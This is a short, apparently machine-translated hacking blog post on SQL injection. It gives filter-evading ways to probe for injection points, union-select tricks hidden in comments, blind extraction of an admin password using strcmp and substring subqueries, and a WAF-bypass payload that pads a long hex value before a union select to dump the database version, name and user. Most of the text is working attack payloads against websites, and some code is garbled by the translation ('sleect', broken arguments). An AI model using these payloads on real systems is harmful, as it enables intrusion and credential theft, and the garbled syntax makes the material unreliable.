New SQL Injection

Currently, it is generally determined whether a website has an injection point. "', And 1 = 1, and 1 = 2" is often used, but it is certainly filtered out.
First, let's judge:
But we can also use null to judge: and 1 is null, and 1 is not null
In addition, it is not necessary to use "=". You can also use ">=, <=, is null, is not null," <>, and so on.
For example, and 2 <= 3
Next we will talk about injection.
For injection values, we are familiar with union select and blind injection.
Union Select
For conventional injection, We Can union select 1, 2, 3, 4, or union/**/select/*/1, 2, 3, 4
Of course, when the statement passes multiple parameters, such as slect * from table where id = 1 and name = xxx, we can do this:
Id = 1 + union/* & name = */select + 1, 2
Slect * from table where id = 1 union/* and name = xxx */select 1, 2, 4, 4
 
Let's talk about www.2cto.com
Generally, ascii (substring (password,) = xx, or
Ord (mid (password, 1, 1) = xx
I recommend that you use subqueries.
I would like to recommend some new methods from a blog:
Find_in_set example: find_in_set ('56', ascii (substr (password, 1, 1) = 1
Strcmp example: strcmp (left ('Password', 1), 0 × 56) = 1
Set these functions as subqueries:
Id = 1 + and + strcmp (substring (sleect + password + from + admin + limit +),), 0 × 55) = 1 false
Id = 1 + and + strcmp (substring (sleect + password + from + admin + limit +),), 0 × 56) = 0
True
Id = 1 + and + strcmp (substring (sleect + password + from + admin + limit +),), 0 × 57) =-1
False
 
Foreigner NB Method
Http://www.xxx.com/index.php? Content = more_product & id =-17 and (select
1) = (select
0 xaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa
Aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa
Aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa
Aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa
Aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa
Aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa
Aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa
Aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa
Aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa
Aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa
Aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa
Aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa
Aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa
Aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa
Aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa
AAAAAAAAAAAAAAAA) + /*! Union */+ select + 1, 2, 4, 5, 6-+-
 
Http://www.xxx.com/index.php? Content = more_product & id =-17 and (select 1) = (select
0 xaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa
Aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa
Aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa
Aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa
Aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa
Aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa
Aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa
Aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa
Aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa
Aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa
Aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa
Aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa
Aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa
Aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa
Aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa
AAAAAAAAAAAAAAAA) + /*! Union */+ select + 1, concat_ws (0x7c, version (), database (), u
Ser (), 3, 4, 5, 6-+-
Author XSnake's Blog